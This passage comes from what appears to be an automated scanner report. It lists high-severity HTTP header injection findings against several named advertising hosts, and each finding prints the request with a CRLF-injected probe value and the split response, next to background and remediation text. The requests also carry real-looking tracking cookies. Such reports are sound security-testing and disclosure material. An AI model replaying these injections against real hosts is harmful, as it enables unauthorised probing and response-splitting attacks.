http://tacoda.at.atwola.com/rtx/r.js [si parameter]
http://widgetserver.com/syndication/get_widget.js [callback parameter]

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

2.1. http://ad.doubleclick.net/dot.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload cb557%0d%0a32406b19dfe was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dot.gifcb557%0d%0a32406b19dfe?2011.04.27.23.14.45 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gifcb557
32406b19dfe:
Date: Wed, 27 Apr 2011 23:15:24 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.2. http://amch.questionmarket.com/adsc/d674921/2/717103/decide.php [XCLGFbrowser parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d674921/2/717103/decide.php

Issue detail

The value of the XCLGFbrowser request parameter is copied into the Set-cookie response header. The payload 3c28d%0d%0adc0429741c1 was submitted in the XCLGFbrowser parameter. This caused a response containing an injected HTTP header.

Request

GET /adsc/d674921/2/717103/decide.php?XCLGFbrowser=3c28d%0d%0adc0429741c1 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.cnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1; ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3; LP=1303907865

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:17:19 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Set-cookie: GP=XCLGFbrowser=3c28d
dc0429741c1; expires=Sun, 17-Jun-2012 15:17:19 GMT; path=/; domain=.questionmarket.com
Set-Cookie: linkjumptest=1; path=/; domain=.questionmarket.com
Set-Cookie: endsurvey=no; path=/; domain=.questionmarket.com
Set-Cookie: CS1=deleted; expires=Tue, 27-Apr-2010 23:17:18 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1; expires=Sun, 17-Jun-2012 15:17:19 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-.nE'M-0; expires=Sun, 17-Jun-2012 15:17:19 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 45
Content-Type: text/html

/* a231.dl - Fri Dec 03 11:42:29 EST2010 */
;

2.3. http://amch.questionmarket.com/adsc/d674921/2/717103/decide.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d674921/2/717103/decide.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Set-cookie response header. The payload f468c%0d%0a2f69e6bfaeb was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /adsc/d674921/2/717103/decide.php?XCLGFbrowser=Cg8JIk24ijttAAA/f468c%0d%0a2f69e6bfaebASDs HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.cnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1; ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3; LP=1303907865

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:17:32 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Set-cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAA/f468c
2f69e6bfaebASDs; expires=Sun, 17-Jun-2012 15:17:32 GMT; path=/; domain=.questionmarket.com
Set-Cookie: linkjumptest=1; path=/; domain=.questionmarket.com
Set-Cookie: endsurvey=no; path=/; domain=.questionmarket.com
Set-Cookie: CS1=deleted; expires=Tue, 27-Apr-2010 23:17:31 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1; expires=Sun, 17-Jun-2012 15:17:32 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-{nE'M-0; expires=Sun, 17-Jun-2012 15:17:32 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 45
Content-Type: text/html

/* a210.dl - Fri Dec 03 11:42:29 EST2010 */
;

2.4. http://amch.questionmarket.com/adsc/d884653/4/500005059184/decide.php [ES cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d884653/4/500005059184/decide.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload e4aa5%0d%0a6fb47c3f680 was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adsc/d884653/4/500005059184/decide.php?ord=1303946368 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2397089&PluID=0&w=300&h=250&ord=2011.04.27.23.19.11&ifrm=2&ucm=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1303907865; GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; linkjumptest=1; endsurvey=no; CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1; ES=e4aa5%0d%0a6fb47c3f680

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:21:15 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a231.dl
Set-Cookie: CS1=deleted; expires=Tue, 27-Apr-2010 23:21:14 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1; expires=Sun, 17-Jun-2012 15:21:15 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=e4aa5
6fb47c3f680_884653-jqE'M-0; expires=Sun, 17-Jun-2012 15:21:15 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

2.5. http://amch.questionmarket.com/adscgen/sta.php [code parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/sta.php

Issue detail

The value of the code request parameter is copied into the Location response header. The payload dc802%0d%0ae91160a4f58 was submitted in the code parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/sta.php?survey_num=884653&site=2397089&code=5059184dc802%0d%0ae91160a4f58&ut_sys=eb HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2397089&PluID=0&w=300&h=250&ord=2011.04.27.23.19.11&ifrm=2&ucm=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1303907865; GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; linkjumptest=1; endsurvey=no; CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1; ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0

Response

HTTP/1.1 302 Found
Date: Wed, 27 Apr 2011 23:20:56 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a209.dl
Set-Cookie: CS1=deleted; expires=Tue, 27-Apr-2010 23:20:55 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_884653-1-1; expires=Sun, 17-Jun-2012 15:20:56 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-QqE'M-0; expires=Sun, 17-Jun-2012 15:20:56 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=eb&survey_num=884653&site=4-2397089-&code=5059184dc802
e91160a4f58
Content-Length: 33
Content-Type: text/html

/* /adsc/d884653/4/-1/randm.js */

2.6. http://amch.questionmarket.com/adscgen/sta.php [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/sta.php

Issue detail

The value of the site request parameter is copied into the Location response header. The payload 78c5f%0d%0ab88c640c95c was submitted in the site parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/sta.php?survey_num=884653&site=78c5f%0d%0ab88c640c95c&code=5059184&ut_sys=eb HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2397089&PluID=0&w=300&h=250&ord=2011.04.27.23.19.11&ifrm=2&ucm=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1303907865; GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; linkjumptest=1; endsurvey=no; CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1; ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0

Response

HTTP/1.1 302 Found
Date: Wed, 27 Apr 2011 23:20:52 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a209.dl
Set-Cookie: CS1=deleted; expires=Tue, 27-Apr-2010 23:20:51 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_884653-1-1; expires=Sun, 17-Jun-2012 15:20:52 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-MqE'M-0; expires=Sun, 17-Jun-2012 15:20:52 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=eb&survey_num=884653&site=-1-78c5f
b88c640c95c-&code=5059184
Content-Length: 44
Content-Type: text/html

/* /adsc/d884653/-1/500005059184/randm.js */

2.7. http://d.xp1.ru4.com/activity [redirect parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d.xp1.ru4.com
Path:	/activity

Issue detail

The value of the redirect request parameter is copied into the Location response header. The payload 3a9b5%0d%0a49214e9d931 was submitted in the redirect parameter. This caused a response containing an injected HTTP header.

Request

GET /activity?_o=62795&_t=cm_admeld&redirect=3a9b5%0d%0a49214e9d931&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=303&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: d.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetcommerce/728x90/cnetcommerce_atf?t=1303941377365&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=AM-00000000030620452

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 27 Apr 2011 21:59:57 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: O62795=0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-1970 12:00:00 GMT
Location: http://3a9b5
49214e9d931?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=303&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match
Content-length: 0
Connection: close

2.8. http://dw.com.com/clear/c.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dw.com.com
Path:	/clear/c.gif

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 94b6b%0d%0a1db13f889e3 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /clear/94b6b%0d%0a1db13f889e3?onid=11446&edid=3&ptid=6199&ts=1303939652936&sid=226&ld=domainhelp.search.com&xrq=sid%3D2&oid=6199-11446_226-0&brflv=10.2.154&brwinsz=1x1&brscrsz=1920x1200&brlang=en-US&tcset=utf8&im=dwjs&xref=http%3A%2F%2Fui-layouts.com.com%2Ftsi%2F&srcUrl=http%3A%2F%2Fdomainhelp.search.com%2Fsearch%3Fq%3Dui-layouts%26d%3Dui-layouts.com.com&title=ui-layouts.com.com%20-%20Search.com HTTP/1.1
Host: dw.com.com
Proxy-Connection: keep-alive
Referer: http://domainhelp.search.com/search?q=ui-layouts&d=ui-layouts.com.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Wed, 27 Apr 2011 21:38:11 GMT
Server: Apache/2.0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, no-transform
Vary: *
Expires: Fri, 23 Jan 1970 12:12:12 GMT
Set-Cookie: XCLGFbrowser=Cg8JIU24jMM4AAAAGgs; expires=Mon, 26-Apr-2021 21:38:11 GMT; domain=.com.com; path=/
Location: http://dw.com.com/clear/redx/94b6b
1db13f889e3?onid=11446&edid=3&ptid=6199&ts=1303939652936&sid=226&ld=domainhelp.search.com&xrq=sid%3D2&oid=6199-11446_226-0&brflv=10.2.154&brwinsz=1x1&brscrsz=1920x1200&brlang=en-US&tcset=utf8&im=dwjs&xref=http%3A%2F%2Fui-layouts.com.com%2Ftsi%2F&srcUrl=http%3A%2F%2Fdomainhelp.search.com%2Fsearch%3Fq%3Dui-layouts%26d%3Dui-layouts.com.com&title=ui-layouts.com.com%20-%20Search.com
Content-Length: 0
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Content-Type: image/gif

2.9. http://dw.com.com/clear/redx/c.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dw.com.com
Path:	/clear/redx/c.gif

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 6be16%0d%0a6954d9b796 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /clear/6be16%0d%0a6954d9b796/c.gif?onid=11446&edid=3&ptid=6199&ts=1303939652936&sid=226&ld=domainhelp.search.com&xrq=sid%3D2&oid=6199-11446_226-0&brflv=10.2.154&brwinsz=1x1&brscrsz=1920x1200&brlang=en-US&tcset=utf8&im=dwjs&xref=http%3A%2F%2Fui-layouts.com.com%2Ftsi%2F&srcUrl=http%3A%2F%2Fdomainhelp.search.com%2Fsearch%3Fq%3Dui-layouts%26d%3Dui-layouts.com.com&title=ui-layouts.com.com%20-%20Search.com HTTP/1.1
Host: dw.com.com
Proxy-Connection: keep-alive
Referer: http://domainhelp.search.com/search?q=ui-layouts&d=ui-layouts.com.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 302 Found
Date: Wed, 27 Apr 2011 21:33:03 GMT
Server: Apache/2.0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, no-transform
Vary: *
Expires: Fri, 23 Jan 1970 12:12:12 GMT
Location: http://dw.search.com/clear/6be16
6954d9b796/c.gif?ts=1303939983777470&clgf=Cg8JIk24ijttAAAASDs
Content-Length: 0
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Content-Type: image/gif

2.10. http://dw.com.com/clear/redx/c.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dw.com.com
Path:	/clear/redx/c.gif

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 7f0ea%0d%0aecda438f9dd was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /clear/redx/7f0ea%0d%0aecda438f9dd?onid=11446&edid=3&ptid=6199&ts=1303939652936&sid=226&ld=domainhelp.search.com&xrq=sid%3D2&oid=6199-11446_226-0&brflv=10.2.154&brwinsz=1x1&brscrsz=1920x1200&brlang=en-US&tcset=utf8&im=dwjs&xref=http%3A%2F%2Fui-layouts.com.com%2Ftsi%2F&srcUrl=http%3A%2F%2Fdomainhelp.search.com%2Fsearch%3Fq%3Dui-layouts%26d%3Dui-layouts.com.com&title=ui-layouts.com.com%20-%20Search.com HTTP/1.1
Host: dw.com.com
Proxy-Connection: keep-alive
Referer: http://domainhelp.search.com/search?q=ui-layouts&d=ui-layouts.com.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 302 Found
Date: Wed, 27 Apr 2011 21:33:15 GMT
Server: Apache/2.0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, no-transform
Vary: *
Expires: Fri, 23 Jan 1970 12:12:12 GMT
Location: http://dw.search.com/clear/7f0ea
ecda438f9dd?ts=1303939995569160&clgf=Cg8JIk24ijttAAAASDs
Content-Length: 0
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Content-Type: image/gif

2.11. http://tacoda.at.atwola.com/rtx/r.js [N cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tacoda.at.atwola.com
Path:	/rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload 1cb33%0d%0aa98fe5cd67d was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=OTH&si=18181&pi=L&xs=3&pu=http%253A//www.cbsnews.com/%253Fifu%253D&df=1&v=5.5&cb=50841 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; N=2:63136b7f5ed8fe53e6d4a6a9fc75f3cd,ff33ea61b6fcafb8c7a1e9f8316359161cb33%0d%0aa98fe5cd67d; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=50212^1^1304141664|50280^1^1304141756|50216^1^1304218502|53615^1^1304218529|50221^1^1304512529|60190^1^1304512529; TData=99999|^|53380|60490|52615|60491|50507|53656|55401|60506|57094|51182|56673|54057|56969|56835|56780|50212|56987|50221|50216|53575|#|50280|53615|60190; ATTAC=a3ZzZWc9OTk5OTk6NTMzODA6NjA0OTA6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDY6NTcwOTQ6NTExODI6NTY2NzM6NTQwNTc6NTY5Njk6NTY4MzU6NTY3ODA6NTAyMTI6NTY5ODc6NTAyMjE6NTAyMTY6NTM1NzU6NTAyODA6NTM2MTU6NjAxOTA=; eadx=x

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:18:10 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Wed, 27 Apr 2011 23:33:10 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Sat, 21-Apr-12 23:18:10 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=50212^1^1304141664|50280^1^1304551090|50216^1^1304218502|53615^1^1304218529|50221^1^1304512529|60190^1^1304512529; path=/; expires=Wed, 04-May-11 23:18:10 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1303946290^1303948090|18181^1303946290^1303948090; path=/; expires=Wed, 27-Apr-11 23:48:10 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|53380|60490|52615|60491|50507|53656|55401|60506|57094|51182|56673|54057|56969|56835|56780|50212|56987|50221|50216|53575|#|50280|53615|60190; expires=Sat, 21-Apr-12 23:18:10 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:ff33ea61b6fcafb8c7a1e9f8316359161cb33
a98fe5cd67d,5fe4d0c3901c5337a9498eac0b10cce3; expires=Sat, 21-Apr-12 23:18:10 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTMzODA6NjA0OTA6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDY6NTcwOTQ6NTExODI6NTY2NzM6NTQwNTc6NTY5Njk6NTY4MzU6NTY3ODA6NTAyMTI6NTY5ODc6NTAyMjE6NTAyMTY6NTM1NzU6NTAyODA6NTM2MTU6NjAxOTA=; expires=Sat, 21-Apr-12 23:18:10 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 242
Content-Type: application/x-javascript
Content-Length: 242

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|53380|60490|52615|60491|50507|53656|55401|60506|57094|51182|56673|54057|56969|56835|56780|50212|56987|50221|50216|
...[SNIP]...

2.12. http://tacoda.at.atwola.com/rtx/r.js [si parameter] previous next

Summary

Severity:	High
